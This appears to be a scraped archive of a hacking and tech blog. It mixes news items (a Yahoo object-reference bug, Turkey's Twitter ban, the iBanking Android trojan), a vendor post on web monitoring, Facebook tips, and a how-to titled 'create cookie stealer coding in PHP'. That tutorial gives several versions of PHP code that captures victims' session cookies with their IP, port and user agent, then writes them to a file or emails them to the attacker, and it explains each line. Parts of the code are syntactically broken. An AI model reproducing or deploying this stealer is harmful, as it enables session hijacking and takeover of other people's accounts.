Trick:- Change Facebook Account Username After Limit

Hello Viewers! Here is the trick to change your Facebook account username after the limit reached or by this method you can remove your username by following these simple steps below!

1. Create a Fan page with category "Artist, Band or Public Figure"

2. Go to your Page Admin Panel & then cick  "Edit Settings" & Click "Update Page Info"

3. Find "Facebook Web Address." Click on it then you will get the option "Create a web address for a page?"Click on it.

4.Make your account username there on page web address & Click "Check Availability"


5.  It will ask you to transfer username. Click on it.

6.  After transferring it your username will be got removed from your account.

So, your username has been removed from your account & then go to your account settings and make a new username or don't make a username. Thanks Alot for being a part of my Website.

If you still feel any difficulty to try this method or it doesn't work, then message me on my Facebook Account

Security bug in Yahoo allows anyone to delete millions of records from the database.

Ibrahim Raafat found a vulnerability on He stated that anyone can delete millions of records stored in the database with Direct Object Reference Vulnerability.
He said that he found the bug by adding a comment on someone’s post on Yahoo! Suggestions and checking how the request works when deleting his comments. He was able to delete others’ comments, and also add comments using other account.
He reported the bug to Yahoo!, and it has been patched and he got a bounty.
More information about the bug can be found on his blog.

The 9 Ultimate Hackers of the WORLD.

There are always two sides to a story — sometimes more. Hacking is often seen as a crime, but to the hacker, there’s usually a point to be made. It seems to me that there’s usually a motive behind the hacker’s actions. Don’t get me wrong though, I’m not condoning hacking, especially when it negatively affects the community.

Here’s an interesting infograph created by Simplisafe listing nine “ultimate?” hackers, arranged by the amount of damage they caused. From a computer. Probably in their parents’ garage. Scary.

By @DezignBurg

Turkey banned Twitter

Twitter users from Turkey were blocked from accessing the microblogging website early on Friday, March 21, hours after Turkish Prime Minister  Recep Tayyip Erdogan had threatened to shut it down.

The cause for the shutdown is the failure of Twitter to remove wiretapped recordings leaked in the social media network which allegedly damaged the reputation of the Turkish government.
Turk visitors of the website were redirected into a page showing a message from Turkey’s telecommunications authority which explained the site’s closure, citing court orders.
However, things seem to go the other way around to the Prime Minister for as soon as the shutdown spread, netizens gathered up and showed their disapproval as hashtags like #TwitterIsBlockedInTurkey and #TurkeyBlocksTwitter trended on top worldwide.
Twitter, on the other hand, had said that they are ”looking into this now” and had also sent messages informing that blocked users can still tweet by using short message service, or SMS.  Furthermore, blocked users had also found their own ways as proven by the increase in the usage of Virtual Private Networks (VPNs) in the country.
Audio recordings were leaked in the website prior to the local elections in Istanbul, Turkey happening on March 30, and are said to be conversations between the Prime Minister and his son talking about hiding large amounts of money.

How to create cookie stealer coding in PHP get via email?

Here is simple cookie stealer code (Cookie code store in file)
$cookie = $HTTP_GET_VARS["cookie"];$steal = fopen("cookiefile.txt", "a");fwrite($steal, $cookie ."\\n");fclose($steal);?>

$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookie file in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail  

$cookie = $HTTP_GET_VARS["cookie"]; mail("", "Stolen Cookies", $cookie); 

The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version

function GetIP() 

    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
        $ip = $_SERVER['REMOTE_ADDR']; 
        $ip = "unknown"; 

function logData() 

    $cookie = $_SERVER['QUERY_STRING']; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER['REMOTE_PORT']; 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 
    $rqst_method = $_SERVER['METHOD']; 
    $rem_host = $_SERVER['REMOTE_HOST']; 
    $referer = $_SERVER['HTTP_REFERER']; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 


The above Cookie stealer will store the following information:

Ip address.
Port number.
Host (usually computer-name)
User agent

6 Web Security Risks of Not Monitoring Internet Activity

Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for some it is even a vital component of their job,) it enables them to find solutions to problems, research the competition, find new customers, and more. But Internet access comes with a host of threats and if you are not on top of your web security game, allowing your users to have Internet access may cause just as many problems as it can solve. If you are going to provide your users Internet access, consider these top six web security risks of not monitoring Internet activity, and deploy a web security solution to make sure you don’t regret the generosity to your users.

1. Malware
Whether your users download infected files or they just visit compromised websites, malware infections are the single biggest risk to your users from Internet access. Web security applications can scan all files for malware and block access to known infected sites. They can also filter out malicious scripts embedded in web pages, providing strong protection against malware for your users.

2. Phishing
Phishing attacks not only put your users at risk, they can have significant and long lasting impact to your customers, your financials, and your reputation. As much as we raise awareness of phishing attacks, you can read about a new business falling victim almost weekly. Web security software can completely block access to known phishing sites, so even if your users do fall for a phishing email, they cannot submit sensitive information to the attacker’s website.

3. Copyright infringement
Even the best intentions can lead to costly impact to your business, and when users download audio and video files without obtaining the rights to them, the copyright holders can go after your business for compensation. Web security software can block the download of media files, or can filter access based on category to help prevent users from downloading content that might cost you in the long term.

4. Licensing violations
Audio and video are not the only ways a user’s actions can lead to fines and penalties. When users download and install software without obtaining a license for it, the company can be held liable as well. Sites that host cracked software, keygens, and other warez can be blocked completely using web security software, so you can exercise due diligence and avoid a run-in with the Business Software Alliance or other licensing issue.

5. Human Resources incidents
What’s appropriate to access at work and what users may be accustomed to accessing at home are often at opposite ends of the content spectrum, and it’s easy for a user to be offended, or even feel harassed, if exposed to content another user is accessing. This leads to workplace problems including morale issues, teamwork challenges, and can quickly escalate to an incident that involves HR and could lead to someone losing their job. You can avoid all of that by using web security software to block access to content inappropriate for the workplace, and to enforce safe search results in the major search engines.

6. Bandwidth consumption
Media sites such as YouTube, Netflix, Hulu, Pandora, Internet radio and television streaming sites, and others are great for when you are at home, but if only a handful of your users decide to start listening to their favorite music feed, or surreptitiously watching a movie while they should be working, you can quickly find your network without enough bandwidth to support the business critical applications like email. Web security software can block access to the non-business critical sites, and throttle bandwidth consumption for the sites you do want to allow, to ensure there is enough available for what your network really needs.

7. Wasting time
How often has a “quick” web search or social media check-in caused you to lose track of time? Now multiply that by the number of users on your network, who will do exactly the same thing, and you can quickly see how you can lose hours of productivity each day. Web security software can block access to social media sites, but the best products can instead simply limit the amount of total time or the time frames when users can use the web for recreational purposes. A few minutes here and there is a perfectly good way to ensure morale doesn’t suffer, and if a user wants to spend their lunch break updating their wall…what’s the harm in that, as long as they get back to work at the end of their lunch?

So don’t think web access without addressing web security. Web security applications can monitor access, filter out malware, block access to phishing sites or repositories, prevent the download of files that might contain copyrighted material, restrict the amount of bandwidth burned on streaming media, and even keep users from wasting time on social media sites. Web security applications are a critical component of your Internet security, and help to ensure that Internet access is a benefit, and not a risk to your company.

This guest post was provided by Casper Manes on behalf of GFI Software Ltd. 

iBanking Android Malware targeting Facebook Users

 iBanking is nothing but a mobile banking Trojan app which impersonates itself as a so-called 'Security App' for Android devices and distributed through HTML injection attacks on banking sites, in order to deceive its victims.

Recently, its source code has been leaked online through an underground forum that gave the opportunities to a larger number of cyber criminals to launch attacks using this kind of ready-made mobile malware.

The malicious iBanking app installed on victims’ phone has capabilities to spy on user’s communications. The bot allows an attacker to spoof SMS, redirect calls to any pre-defined phone number, capture audio using the device's microphone and steal other confidential data like call history log and the phone book contacts.

According to new report from ESET security researchers, now this iBanking Trojan (Android/Spy.Agent.AF) is targeting Facebook users by tricking them to download a malware application.

The malware uses JavaScript web injection method to create a fake Facebook Verification page for Facebook users, as shown:

Injected fake verification page prompts users to enter their mobile number in order to verify the Facebook account authenticity, and then shows the following page if he indicates that his mobile is running Android.

Next fake page asks victim to download an Android app from the shown URL or using QR code method, if SMS somehow fails to reach the user’s phone. Once downloaded and installed, the malware connects to its command-and-control server that allows attackers to issue commands to each infected device.

Facebook also has two-factor authentication features for quite a long time, but this is the very first time when Facebook users are targeted by iBanking Trojan. The reason may be an increasing number of people using it.

Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, but in order to bypass two factor authentication, cyber criminals have started to create various mobile malware like iBanking to solve their purpose.

iBanking Trojan can be used in conjunction with any malware in order to inject code into a webpage and is generally used to redirect incoming SMS messages to bypass two-factor authentication.

It is always important to treat third-party apps with a healthy dose of suspicion and skepticism as cybercriminals are always out there to hijack your every device.

Don't just download any app from any source you happen to encounter and before installing a new app, just check out the reputation of both the app and the publisher. In order to prevent direct installations, go to your Android device’s Applications Settings menu and disable the “unknown sources” option for installing apps.

Stay Safe! :)

Twitter Launches Mobile App Promotion Suite

Twitter acquired MoPub way back in September of last year but, until now, hasn't done much with the purchase. Well, be still your beating heart, as Twitter has justunveiled a new mobile app promotion suite which uses MoPub technology, which will allow marketers to promote their apps both on and off Twitter.

The MoPub marketplace reaches more than one billion unique devices around the globe, handling more than 130 billion ad requests every 30 days, and advertisers can now run simultaneous marketing campaigns both on Twitter (and its 241 million users) and MoPub to push users to download their mobile apps, all of which will be accessible in a one-click download button, that looks like this:

Says Twitter:

We have developed a full suite of targeting, creative and measurement tools to enable Twitter advertisers to effectively promote their mobile apps. These are being tested in a private beta, and you may have already seen some examples of these app promotions on Twitter. For marketers, this means a rich, native ad unit that combines the best of Twitter Cards and Promoted Tweets. Users can easily install and engage with apps, directly from the Twitter timeline.

Risks of Using Facebook Auto Likers at Status and Photos of Profile

Facebook is best place for connecting with people. We use Facebook daily to do chatting, calling, sharing Status and Photos which we find interesting. Facebook having lots of entertaining features which create addition. As a normal Facebook user only have around 100-500 friends in there friend list. So we share our thoughts and other day to day moments. but according to Facebook algorithm we only receives around 10-50 likes not for all just Facebook applied a reach limits at all profiles and pages. So it really embarrassing movement when we didn't get likes and comments on our status.
Due to of all these conditions Facebook users start using new method which is known as Auto Likes. They use these auto likers through any website and get hundreds and thousands of likes at their Status and Photos. They use this technique just to attract others by showing too many likes.
facebook auto like risks

What are Auto Likers and How it works ?

Facebook Autolikers are best way to get automatic likes at status and profiles. Facebook Autolikers are websites which collection personal data through token number. Then this collected data is used to generate auto likes. Now the question how they are collecting data. Whenever someone use these auto likers then these sites access their token number to make likes just like if 10 person use any autoliker then they have 10 collected likes. Now if someone use same autoliker then they will get 10 likes on his/her status. In the same total likes increase day by day within increase of their users.Only way to find total likes available is just depend on how many user already used it to get likes. There are many website who offer auto likes in which they need your token number to get access into your account and then they need status id or photo id where want to show fake likes. 

Is Auto Likers are Harmful or Not ?

According to Facebook is totally a spam and totally a risky process. Using any Auto liker may results your account disabled or Facebook may apply few restriction on Account. These auto likers may result your account compromised because all the website need token number which means you are providing all the privileges to that application which you use to generate token number. According to Facebook Access Token number it works like an account Passwords. So Any service which need To Token of account may harm your personal information. For more details search at Facebook help center about Access Token
facebook autolikers using risk

Few Suggestions About Using Facebook Auto Likers

  • Never use Auto Like services from your original Account.
  • Auto Likers need Access Token Number which works like a password. So using it through your personal account may result account compromised.
  • Getting Auto likes on Status or Photo is also against Facebook usage terms. So Facebook may apply restriction on Liking and commenting and results into account disable. 

How To Verify Your Facebook Page or Profile ? Submit Verification Request

facebook verified PageFacebook recently introduce new feature to show that a page or profile is verified or not. As a normal Facebook user we all create account or page with our name and it is also possible to create multiple account on same name. Their are number of same name pages or account for any celebrity, public figure or for any business. So Facebook take serious step to make clear that which one is official and all the rest of others are not. This verification show that the page or profile your are visiting official represent someone or maybe a property of anybody.

What is Verified Profile or Page ?

According to this new option some pages and Profiles are  claim as Official and verified by Facebook. You may observe on many profiles and pages their is Blue Color Tick Badge just in the next of name.  
facebook verified badge

Facebook only four type of pages or profiles which are
  • Celebrities
  • Journalists
  • Government Officials
  • Popular Brand or Businesses
These are four categories whose pages and profiles are claimed by Facebook based on their popular. Suppose if you have any local business which is popular then Facebook may claimed your page if you are official representative. Then their is no need to submit any type of request to Facebook. They automatically claim your page as verified depend on some details and minimum requirements mention by Facebook.

How To Get Verified ?

If your profile or any Page whose your are official representative and also based on above mention categories then their are chances of your page to get verified. Actually Facebook does not have any request form to claim verified this is totally automatic process done from Facebook side. So to become verified in future you should have to do some changes in your Profile or Page
  • Your page should be official represent your local business or any personality and may be have some popularity on Facebook.
For Facebook claiming process your page or profile must have minimum details because if you add full details accurately then Facebook automatically check your provided information if they find your page or profile details accurate and helpful then verify your page here are two parts mention by Facebook to become verified
  • Link To Your Profile or Page From Official Website and also link website on your page or profile.
  • Provide accurate information in details about your business in About Section of Page or Profile
In About section must add significant long and short description, keyword who represent your business, Email, Website, Products and verified page location with claimed business address and other details in Page Info tab. Just for example as shown below

facebook page about
For more details visit help center here for Profile or Page About info.

These are some tips which help you to get verified if your profile or page is official. Facebook don't guaranteed  about all pages to get verified because its totally depend on Popularity and accuracy. So add all information and wait until page processed your profile or page to make you verify. According to me it takes almost 40-50 days after adding info to get verify if Facebook approved your account or page.